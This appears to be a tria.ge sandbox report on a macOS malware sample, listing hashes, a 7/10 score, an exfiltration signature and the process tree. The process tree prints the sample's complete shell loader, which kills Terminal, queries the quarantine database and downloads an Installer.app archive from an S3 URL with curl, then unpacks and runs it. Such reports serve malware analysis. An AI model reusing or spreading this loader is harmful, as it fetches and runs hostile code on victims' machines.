Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    40s
  • max time network
    142s
  • platform
    macos-10.15_amd64
  • resource
    macos-20241106-en
  • resource tags

    arch:amd64arch:i386image:macos-20241106-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
  • submitted
    17/02/2025, 18:06

General

  • Target

    Macos-Malware-Samples-main/07ba2f8c2575e1abf2f53ca10e4d0c9fedfba47f20eb99f67d0e4e2ad01dd006

  • Size

    20KB

  • MD5

    5b98da7c610614a0daadd5b137f2038b

  • SHA1

    244aa58b53218f7ffe50e8abf84dde48eb110551

  • SHA256

    07ba2f8c2575e1abf2f53ca10e4d0c9fedfba47f20eb99f67d0e4e2ad01dd006

  • SHA512

    1771e1d4aa413e72f45d95e1b1b528c6ea47f0d6f01c2a12d5e8b464c253840617b46d12083bd7eca449229956036d1be29dfa8f9182575972220a96934eeb30

  • SSDEEP

    384:RM4140hctqWfrS38dz/oxrkRZv3ywjpPmJIMkDpZUEG1+QS1:+yazDY8dzgmR7KkJx

Score
7/10

Malware Config

Signatures

  • Exfiltration Over Alternative Protocol 1 TTPs 1 IoCs

    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/07ba2f8c2575e1abf2f53ca10e4d0c9fedfba47f20eb99f67d0e4e2ad01dd006\""
    1⤵
      PID:482
    • /bin/bash
      sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/07ba2f8c2575e1abf2f53ca10e4d0c9fedfba47f20eb99f67d0e4e2ad01dd006\""
      1⤵
        PID:482
      • /usr/bin/sudo
        sudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/07ba2f8c2575e1abf2f53ca10e4d0c9fedfba47f20eb99f67d0e4e2ad01dd006
        1⤵
          PID:482
          • /bin/zsh
            /bin/zsh -c /Users/run/Macos-Malware-Samples-main/07ba2f8c2575e1abf2f53ca10e4d0c9fedfba47f20eb99f67d0e4e2ad01dd006
            2⤵
              PID:483
            • /Users/run/Macos-Malware-Samples-main/07ba2f8c2575e1abf2f53ca10e4d0c9fedfba47f20eb99f67d0e4e2ad01dd006
              /Users/run/Macos-Malware-Samples-main/07ba2f8c2575e1abf2f53ca10e4d0c9fedfba47f20eb99f67d0e4e2ad01dd006
              2⤵
                PID:483
            • /bin/sh
              sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/mktemp -d \"\$(dirname \"\${tgz_path}\")/\$(uuidgen)\");if tar -xzf \"\${tgz_path}\" -C \"\${app_dir}\";then echo \"\${app_dir}\";fi;rm -rf \"\${tgz_path}\";};app_path(){ local -r app_dir=\"\${1}\";[ -z \"\${app_dir}\" ]&&return;local -r app_paths=(\"\${app_dir}\"/?*.app);local -r app_path=\"\${app_paths[0]}\";[ -d \"\${app_path}\" ]&&echo \"\${app_path}\";};bin_path(){ local -r app_path=\"\${1}\";[ -z \"\${app_path}\" ]&&return;local -r binary_paths=(\"\${app_path}/Contents/MacOS\"/?*);local -r binary_path=\"\${binary_paths[0]}\";echo \"\${binary_path}\";};exec_bin(){ local -r bin_path=\"\${1}\";local -r did=\"\${2}\";local -r app_path=\"\${3}\";[ -z \"\${bin_path}\" ]&&return;\"\${bin_path}\" -did \"\${did}\";};main(){ local -r url=\"\${1}\";close_terminal;local -r did=\"\$(extract_did)\";[ -z \"\${did}\" ]&&return;local -r tmp_dir=\"\$(/usr/bin/mktemp -d \"\$(temp_dir)\$(uuidgen)\")\";local -r arch_path=\"\$(download \"\${url}\" \"\${tmp_dir}\")\";local -r app_dir=\"\$(unarchive \"\${arch_path}\")\";local -r app_path=\"\$(app_path \"\${app_dir}\")\";local -r bin_path=\"\$(bin_path \"\${app_path}\")\";exec_bin \"\${bin_path}\" \"\${did}\" \"\${app_path}\";rm -rf \"\${tmp_dir}\";};main \"https://ywdd6wfq.s3.amazonaws.com/Installer.app.tgz\"&"
              1⤵
                PID:484
              • /bin/bash
                sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/mktemp -d \"\$(dirname \"\${tgz_path}\")/\$(uuidgen)\");if tar -xzf \"\${tgz_path}\" -C \"\${app_dir}\";then echo \"\${app_dir}\";fi;rm -rf \"\${tgz_path}\";};app_path(){ local -r app_dir=\"\${1}\";[ -z \"\${app_dir}\" ]&&return;local -r app_paths=(\"\${app_dir}\"/?*.app);local -r app_path=\"\${app_paths[0]}\";[ -d \"\${app_path}\" ]&&echo \"\${app_path}\";};bin_path(){ local -r app_path=\"\${1}\";[ -z \"\${app_path}\" ]&&return;local -r binary_paths=(\"\${app_path}/Contents/MacOS\"/?*);local -r binary_path=\"\${binary_paths[0]}\";echo \"\${binary_path}\";};exec_bin(){ local -r bin_path=\"\${1}\";local -r did=\"\${2}\";local -r app_path=\"\${3}\";[ -z \"\${bin_path}\" ]&&return;\"\${bin_path}\" -did \"\${did}\";};main(){ local -r url=\"\${1}\";close_terminal;local -r did=\"\$(extract_did)\";[ -z \"\${did}\" ]&&return;local -r tmp_dir=\"\$(/usr/bin/mktemp -d \"\$(temp_dir)\$(uuidgen)\")\";local -r arch_path=\"\$(download \"\${url}\" \"\${tmp_dir}\")\";local -r app_dir=\"\$(unarchive \"\${arch_path}\")\";local -r app_path=\"\$(app_path \"\${app_dir}\")\";local -r bin_path=\"\$(bin_path \"\${app_path}\")\";exec_bin \"\${bin_path}\" \"\${did}\" \"\${app_path}\";rm -rf \"\${tmp_dir}\";};main \"https://ywdd6wfq.s3.amazonaws.com/Installer.app.tgz\"&"
                1⤵
                  PID:484
                • /usr/bin/killall
                  killall Terminal
                  1⤵
                    PID:486
                  • /usr/bin/sqlite3
                    /usr/bin/sqlite3 /Users/run/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 "SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1"
                    1⤵
                      PID:489
                    • /usr/libexec/xpcproxy
                      xpcproxy com.apple.nsurlstoraged
                      1⤵
                        PID:490
                      • /usr/libexec/nsurlstoraged
                        /usr/libexec/nsurlstoraged --privileged
                        1⤵
                          PID:490

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • /var/db/nsurlstoraged/dafsaData.bin

                          Filesize

                          54KB

                          MD5

                          64f469698e53d0c828b7f90acd306082

                          SHA1

                          bcc041b3849e1b0b4104ffeb46002207eeac54f3

                          SHA256

                          d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd

                          SHA512

                          a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f